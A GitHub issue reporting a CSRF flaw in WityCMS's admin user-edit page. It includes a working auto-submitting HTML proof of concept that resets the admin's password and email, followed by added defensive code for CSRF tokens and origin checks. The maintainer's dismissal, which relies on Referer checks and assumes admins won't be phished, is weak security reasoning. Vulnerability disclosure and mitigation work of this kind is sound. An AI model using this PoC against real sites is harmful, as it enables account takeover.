CSRF on admin/user/edit page lead to full account take over #153

Closed
chhaipov opened this issue Jul 11, 2018 · 3 comments
@chhaipov

Hello,

I came across this CMS and tried to find bugs in it. I see that the user edit page is vulnerable to a CSRF attack because there is no CSRF token to validate the user's request. It means that if an admin user visits a crafted URL made by an attacker (via XSS or phishing), a POST request will be generated and submitted to wity/admin/user/edit/1 that will change the admin user's information, including the password and email address.

Once exploited, the attacker can fully take over the admin's account.

Affected URL: http://192.168.56.200/wity/admin/user/edit/1

Steps to reproduce:

  1. Check the POST request sent when a user edits their information on /wity/admin/user/edit/1
     (screenshot not included)

  2. Build a CSRF PoC based on the POST request from user/edit and store it on the attacker's site:

    <iframe id="test" name="test" style="display:none">
    </iframe>
    <form action="http://192.168.56.200/wity/admin/user/edit/1" method="post" id="the_form" style="display:none" target="test">
        <input type="hidden" name="id" value="1" />
        <input type="hidden" name="nickname" value="admin" />
        <input type="hidden" name="password" value="csrf123" />
        <input type="hidden" name="password_conf" value="csrf123" />
        <input type="hidden" name="email" value="csrf@test.com" />
        <input type="hidden" name="groupe" value="0" />
        <input type="hidden" name="type" value="all" />
        <input type="submit" value="Change Password" />
    </form>
    <script type="text/javascript">
    //<![CDATA[
        var $form = document.getElementById('the_form');
        $form.submit();
    //]]>
    </script>

  3. Let the user access the CSRF PoC on the attacker's site; a POST request will then be generated and sent to http://192.168.56.200/wity/admin/user/edit/1
     Visiting the attacker's site: (screenshot not included)
     POST request generated: (screenshot not included)

  4. After that, the user's information will be changed to the values the attacker put in the CSRF PoC.

Mitigation:

The original password should be required in order to set a new password for the user.
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

@nathunandwani

I can confirm the findings of @chhaipov. Just tested in my admin's account through Kali Linux. Best to implement a CSRF token to solve this.
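The two mitigations raised in this thread, a per-session CSRF token (as @nathunandwani suggests) and re-authentication with the current password before a password change (the reporter's "Mitigation" note and the linked OWASP cheat sheet), combined in one handler. This is an added illustration, not WityCMS code: the CMS itself is PHP, the example is written in Python as framework-agnostic logic, and `handle_user_edit`, `SESSIONS`, `USERS`, the `csrf_token` and `current_password` fields and the seeded account are all constructed for the example. Only the field names `nickname`, `password`, `password_conf` and `email` come from the PoC in the issue.

```python
import hashlib
import hmac
import secrets

PBKDF2_ROUNDS = 100_000

# Constructed in-memory stores; a real CMS keeps these in its database and
# server-side session storage.
SESSIONS = {}   # session id -> {"user_id": ..., "csrf_token": ...}
USERS = {}      # user id -> account record


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)


def reset_state():
    """Seed one admin account (id 1, as in the issue) with a constructed password."""
    SESSIONS.clear()
    USERS.clear()
    salt = secrets.token_bytes(16)
    USERS[1] = {"nickname": "admin", "email": "admin@example.invalid",
                "salt": salt, "pw_hash": hash_password("original-password", salt)}


def new_session(user_id):
    """Log a user in and bind a fresh random CSRF token to the session."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"user_id": user_id, "csrf_token": secrets.token_urlsafe(32)}
    return sid


def csrf_token_for(sid):
    """Token the server embeds as a hidden field in its own edit form."""
    return SESSIONS[sid]["csrf_token"]


def csrf_valid(sid, submitted):
    """Compare the submitted token with the session's token in constant time."""
    session = SESSIONS.get(sid)
    if session is None or not submitted:
        return False
    return hmac.compare_digest(session["csrf_token"], submitted)


def handle_user_edit(sid, target_id, form):
    """Hypothetical POST /admin/user/edit/<id> handler returning (status, message).

    Field names (nickname, password, password_conf, email) follow the PoC in
    the issue; csrf_token and current_password are the added protections.
    """
    if not csrf_valid(sid, form.get("csrf_token")):
        return 403, "invalid or missing CSRF token"
    user = USERS.get(target_id)
    if user is None:
        return 404, "no such user"
    if form.get("password"):
        if form["password"] != form.get("password_conf"):
            return 400, "password confirmation mismatch"
        # Re-authentication: a new password requires the current one, so even a
        # request that somehow carries a valid token cannot lock the admin out.
        supplied = hash_password(form.get("current_password", ""), user["salt"])
        if not hmac.compare_digest(supplied, user["pw_hash"]):
            return 403, "current password required to set a new one"
        user["pw_hash"] = hash_password(form["password"], user["salt"])
    for field in ("nickname", "email"):
        if form.get(field):
            user[field] = form[field]
    return 200, "updated"


def demo_token_check():
    """Replay the issue's scenario against the protected handler."""
    reset_state()
    sid = new_session(1)  # the victim admin's browser holds this session cookie

    # Cross-site submission from the PoC page: the browser attaches the cookie,
    # but the attacker's page cannot read the token from the victim's session.
    attacker_form = {"id": "1", "nickname": "admin", "password": "csrf123",
                     "password_conf": "csrf123", "email": "csrf@test.com"}
    cross_site = handle_user_edit(sid, 1, attacker_form)

    # Token present but no current password: the password change is still refused.
    no_reauth = handle_user_edit(sid, 1, {**attacker_form, "csrf_token": csrf_token_for(sid)})

    # Same-origin form rendered by the CMS, with token and current password.
    legit_form = {"csrf_token": csrf_token_for(sid), "current_password": "original-password",
                  "password": "new-pass", "password_conf": "new-pass"}
    legitimate = handle_user_edit(sid, 1, legit_form)

    return {"cross_site": cross_site, "no_reauth": no_reauth, "legitimate": legitimate,
            "email_after": USERS[1]["email"]}


if __name__ == "__main__":
    print(demo_token_check())
```

The token is bound to the server-side session and compared with `hmac.compare_digest`, so a page on another origin, which can make the victim's browser send the cookie but cannot read the victim's form, has nothing valid to submit. Requiring the current password is an independent layer: it protects the password field even if a token were ever leaked.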

@chhaipov (Author)

@nathunandwani thanks for your clarification. I hope the developer will fix this issue soon.

@JohanDufau (Member)

Hello,
You cannot submit a POST request if your referer is different from the current website instance.

Moreover:

  • About phishing: admin users of this CMS are advanced users, so they should not get caught by phishing.
  • About XSS: another issue is dealing with this, so it will be solved in that issue.

Anyway, thanks for your feedback. Don't hesitate to do a PR if you want to share an improvement on the admin logic.
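The maintainer's reply relies on comparing the Referer with the site's own address. The OWASP cheat sheet linked above treats that kind of source check as a defence in depth next to a token, because Origin and Referer are not always sent, and it only holds if the comparison is strict. As an added example (not WityCMS code; Python rather than the CMS's PHP, with `request_is_same_origin` and the header sets constructed for the example), this is a fail-closed check on the parsed origin of the request, exercised against the edit URL from the issue:

```python
from urllib.parse import urlsplit

# Origin the CMS instance is served from (the host used in the issue's report).
CMS_ORIGIN = "http://192.168.56.200"


def origin_of(url):
    """Reduce a URL to scheme://host[:port], or None if it has no usable parts."""
    parts = urlsplit(url)
    if not parts.scheme or not parts.netloc:
        return None
    return f"{parts.scheme.lower()}://{parts.netloc.lower()}"


def request_is_same_origin(headers, expected_origin=CMS_ORIGIN):
    """Strict source check for state-changing requests.

    Prefers the Origin header, falls back to Referer, and fails closed when
    neither is present. The comparison is on the parsed scheme and host, never
    on a string prefix, so a look-alike host name does not match.
    """
    lowered = {name.lower(): value for name, value in headers.items()}
    expected = origin_of(expected_origin)
    origin = lowered.get("origin")
    if origin:
        return origin.lower() == expected   # Origin is already scheme://host[:port]
    referer = lowered.get("referer")
    if referer:
        return origin_of(referer) == expected
    return False


def demo_origin_check():
    """Constructed header sets for the user-edit POST described in the issue."""
    edit_url = CMS_ORIGIN + "/wity/admin/user/edit/1"
    cases = {
        # Form submitted from the CMS's own admin page.
        "same_origin": {"Origin": "http://192.168.56.200", "Referer": edit_url},
        # The PoC from the issue, hosted on an attacker-controlled site (constructed host).
        "cross_site": {"Origin": "http://attacker.invalid",
                       "Referer": "http://attacker.invalid/poc.html"},
        # Client that sends only a Referer.
        "referer_only": {"Referer": edit_url},
        # Host name that merely starts with the expected host; a startswith()
        # comparison on the URL string would wrongly accept this.
        "lookalike_host": {"Referer": "http://192.168.56.200.attacker.invalid/wity/admin/user/edit/1"},
        # Both headers absent (privacy extension or Referrer-Policy: no-referrer).
        "no_headers": {},
        # Sandboxed iframe or opaque redirect: Origin arrives as the literal "null".
        "null_origin": {"Origin": "null"},
    }
    return {name: request_is_same_origin(h) for name, h in cases.items()}


if __name__ == "__main__":
    for name, accepted in demo_origin_check().items():
        print(f"{name:15s} {'accepted' if accepted else 'rejected'}")
```

Two choices matter here: a request with neither header is rejected rather than waved through, and the expected origin is compared against the parsed `scheme://netloc` of the header, not against a prefix of the raw URL. Because legitimate clients can omit both headers, a check like this belongs beside a session-bound token rather than in place of it.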
